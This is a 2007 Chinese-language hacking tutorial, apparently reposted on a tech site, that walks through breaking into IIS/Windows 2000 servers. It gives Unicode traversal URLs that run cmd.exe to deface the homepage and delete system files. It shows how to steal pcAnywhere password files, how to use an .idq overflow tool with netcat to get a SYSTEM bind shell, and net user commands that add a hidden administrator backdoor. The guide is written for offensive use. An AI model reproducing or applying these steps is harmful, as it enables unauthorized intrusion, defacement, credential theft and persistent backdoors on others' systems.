流行的漏洞入侵(一)

ReadyGo!技术成就梦想 网上整理 efish 2007-4-13 16:44:46

1 unicode漏洞
这是老漏洞了,但对于新手来说很好用,而且事实证明现在仍有很多的机子有这种漏洞,ok我们开始
先用扫描器扫到有unicode漏洞的机子,(注意漏洞的编码方式有所不同有的是..%ci%ic.. 用的是..%c0%af..当然还有其它的方式, 具体根据你的扫描器扫出的结果为标准
我们在流览器(ie)的地址栏中输入
..%c1%1c../winnt/system32/cmd.exe?/c+dir
这时你可以看到它的系统目录但我们要的是主页面放置的目录
在输入
..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot
看到了吧,目录中的index.html index.asp default.asp default.asp等等就是它的主页面,
我们来换它的页面
..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe

>+c:\inetpub\wwwroot\default.asp
ok
成功了,此时它的主页面被换成了hacked by kawen
大家可以看看
..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe 执行后是复制,如果换成这个呢
..%c1%1c../winnt/system32/cmd.exe?/c+del+c:\winnt\system32\cmd.exe
没错就是删除了
知道怎么做了吧
呵呵

2利用pcanwhere攻击网站
现在开始入正题了,刚才只是热身
由于nt的机器一般使用pcanywhere进行远程管理,因此如果能够得到pcanywhere远程连接的帐号和密码,那么就能远程连接到主机。 （ ）便可以取得帐号和密码
telnet ip 5631
我们可以看看pcanywhere开了没
使用unicode漏洞+ pcanywhere密码查看工具
首先我们要down一个可以破 pcanywhere的工具

ok 我们现在要找到主机上的*.cif文件
在ie中输入 ..%c1%1c../winnt/system32/cmd.exe?/c+dir c:\*.cif /s
一般citempl.cif为系统默认的密码文件，因此我们需要sa.cif文件。 复制该文件到网站目录下。
需要知道网站目录，可以通过ida,idq漏洞进行得到，也可以去寻找网站中的一个图片文件，比如tscontent.gif文件，然后去查找该文件：使用命令 dir c:\ tscontent.gif /s
比如网站目录为c:\inetpub\wwwroot\ 一般都有是啦 呵呵
密码文件所在目录：c:\program files\pcanywhere\data
下面执行copy命令：
..%c1%1c../winnt/system32/cmd.exe?/c+copy c:\program files\pcanywhere\data\sa.cgi c:\inetpub\wwwroot\
显示1 file(s) copied，就表示复制成功了。

使用ie下载该文件
使用 就可以下载该文件了。

使用pcanywhere密码查看工具得到用户名和密码

3利用.idq漏洞　　

为了方便大家可以看懂下面说的是什么可以先到这里来看看

一共有两个版本.一个是gui版本.一个是命令行版本.
这里我们来说cui版本,反正都差不多了,关键是要多试
首先我们要找到有.idq漏洞的机子,可以用流光扫一下
运行软件
在被攻击ip地址后面写上对方的ip.端口号一般不需要改动.
左面选择操作系统类型.先选择iis5 english win2k sp0吧~
软件的默认绑定cmd.exe的端口是813.不改了.用默认吧~~~
点击idq溢出~~ok~~出现发送shellcode成功的提示了.
接着我们用nc,你可以到到盟下载
c:\>nc -vv xxx.xxx.xxx.xxx 813
xxx.xxx.xxx.xxx: inverse host lookup failed: h_errno 11004: no_data
(unknown) 813 (?) open
microsoft windows 2000
(c) copyright 1985-2000 microsoft corp.

c:\winnt\system32>

ok!!!上来了
你现在有system权限,不错吧,该做什么不用我教了吧,比如为自已留下个后门
net user hacker password /add @#添加一给名为hacker，密码为passwod的用户！
net localgroup administrators hacker /add @# 把刚才创建的用户加入 admnistrators组
ok我们在来看看dos版本
下载软件后会有个运行文件,它太长了,将它必名为kawen
d:\>kawen
运行参数: 操作系统类型 目的地址 web端口 溢出端口
支持的操作系统 类型: ----
0 -- iis5中文win2k sp0
1 -- iis5中文win2k sp1
2 -- iis5中文win2k sp2
3 -- iis5 english win2k sp0
4 -- iis5 english win2k sp1
5 -- --not support -- iis5 english win2k sp2
6 -- iis5 japanese win2k sp0
7 -- iis5 japanese win2k sp1
8 -- --not support -- iis5 japanese win2k sp2

d:\>kawen 3 xxx.xxx.xxx.xxx80 456
连接目的机器 xxx.xxx.xxx.xxx:80 ok.
发送shellcode 到 xxx.xxx.xxx.xxx:80 ok
现在，你可以 连接 该主机的 端口 456了,good luck.!

开始吧
d:\>nc -vv xxx.xxx.xxx.xxx 456
mail.rycf.org 456 (?): connection refused
sent 0, rcvd 0: notsock

没成功.试试sp1.
d:\>kawen 4 xxx.xxx.xxx.xxx 80 888
连接目的机器 xxx.xxx.xxx.xxx:80 ok.
发送shellcode 到 xxx.xxx.xxx.xxx:80 ok
现在，你可以 连接 该主机的 端口 888了,good luck.!
d:\>nc -vv xxx.xxx.xxx.xxx 888
xxx.xxx.xxx.xxx: inverse host lookup failed: h_errno 11004: no_data
(unknown) 888 (?) open
microsoft windows 2000
(c) copyright 1985-2000 microsoft corp.

c:\winnt\system32>
看看我们又成功了

责任编辑: efish 参与评论 查找更多： ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题

2秒记住本站域名

玩过泡泡龙吗？Readygo?Go! 再加上.Com.Cn的后缀，那就是大名小顶的ReadyGo.com.cn

分类导航